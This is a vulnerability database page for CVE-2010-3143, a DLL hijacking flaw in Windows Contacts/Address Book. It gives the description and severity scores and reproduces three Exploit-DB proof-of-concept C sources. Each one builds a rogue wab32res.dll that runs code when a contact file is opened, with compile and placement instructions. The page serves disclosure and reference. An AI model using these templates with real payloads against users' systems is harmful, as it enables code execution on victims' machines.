CVE-2010-3143 : Detail

CVE-2010-3143

8.52%V3
Network
2010-08-27
16h10 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 14745

Publication date : 2010-08-24 22h00 +00:00
Author : Beenu Arora
EDB Verified : Yes

/* # Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora # Site : www.beenuarora.com Exploit Title: Microsoft Address Book DLL Hijacking Date: 25/08/2010 Author: Beenu Arora Tested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512 Vulnerable extensions: wab , p7c Compile and rename to wab32res.dll, create a file in the same dir with one of the following extensions: .wab,p7c */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void hook_startup() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } // POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip
Exploit Database EDB-ID : 14778

Publication date : 2010-08-24 22h00 +00:00
Author : storm
EDB Verified : Yes

/* Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) Date: August 25, 2010 Author: storm ([email protected]) Tested on: Windows Vista SP2 http://www.gonullyourself.org/ gcc -shared -o wab32res.dll Contacts-DLL.c .contact, .group, .p7c, .vcf, and .wab files are affected. */ #include <windows.h> int hax() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { hax(); return 0; }
Exploit Database EDB-ID : 14733

Publication date : 2010-08-23 22h00 +00:00
Author : TheLeader
EDB Verified : No

/* Exploit Title: Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) Date: 24/08/2010 Author: TheLeader Email: gsog2009 [a7] hotmail [d0t] com Version: 6.1.7600 and prior Tested on: Windows 7 x86 (6.1.7600) There's a chance this one works with vista. Instructions: Compile and rename to wab32res.dll, create a file in the same dir with one of the following extensions: .vcf / .p7c / .group / .contact Double click & watch a sexy calculator pop =X *Random noises* to all the great guys at forums.hacking.org.il */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) int evil() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { evil(); return 0; }

Products Mentioned

Configuraton 0

Microsoft>>Windows >> Version *

References

http://www.exploit-db.com/exploits/14778/
Tags : exploit, x_refsource_EXPLOIT-DB